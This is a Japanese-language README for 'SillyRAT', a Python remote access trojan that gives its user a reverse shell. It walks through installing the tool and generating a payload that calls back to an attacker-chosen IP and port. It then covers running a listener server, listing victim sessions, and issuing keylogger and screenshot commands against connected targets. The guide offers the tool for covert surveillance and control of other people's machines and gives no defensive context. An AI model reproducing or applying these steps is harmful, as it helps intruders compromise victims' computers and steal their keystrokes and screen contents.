
PythonベースのRAT 🐀 (リモートアクセス型トロイの木馬) リバースシェルを取得するためのもの 🖥️

純粋なPythonで書かれたクロスプラットフォームのRATです。RATはコマンドと引数を受け付け、接続を受け付けるサーバーとして動作するか、サーバーに接続を確立するクライアント/ターゲットとして動作します。generateコマンドは、pyinstallerモジュールを使用して実際のペイロードコードをコンパイルします。そのため、各プラットフォーム用のペイロードファイルを生成するには、そのプラットフォーム上でファイルを生成する必要があります。さらに、ソースファイルも直接入手できます。
このツールは、Python 3.8 を使用して Parrot OS でテストされています。 以下の手順でインストールしてください:
$ git clone https://github.com/hash3liZer/SillyRAT.git
$ cd SillyRAT/
$ pip3 install -r requirements.txt
ペイロードファイルは2つの方法で入手できます:
$ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/payload.py --source
コンパイルバージョンは各プラットフォーム上で生成する必要があります。例えば、Linux上で.exeファイルを生成することはできません。特にWindows上である必要があります。このツールはまだテスト段階です。そのため、あらゆる種類のエラーは許容されます。ただし、必ずIssueを開いてください。Linux用のコンパイルバージョンを生成する:
$ python3 server.py generate --address 134.276.92.1 --port 2999 --output /tmp/filer

上記のコマンドでIPアドレスとポートを置き換えてください。
サーバーはLinux上で実行する必要があります。接続用にVPSやクラウドサーバーを購入できます。注意点として、サーバーは前回の実行からセッションを保存しません。そのため、サーバーアプリケーションが終了するとすべての進行状況が失われます。サーバーを実行する:
$ python3 sillyrat.py bind --address 0.0.0.0 --port 2999
すべての接続はsessionsコマンドで一覧表示されます:
$ sessions

connectコマンドでターゲットセッションに接続し、利用可能なコマンドを実行できます:
$ connect ID
$ keylogger on
$ keylogger dump
$ screenshot

利用可能なコマンドの一覧を表示:
$ help
特定のコマンドのヘルプ:
$ help COMMAND
Twitter:@hash3liZer
Discord:TheFlash2k#0407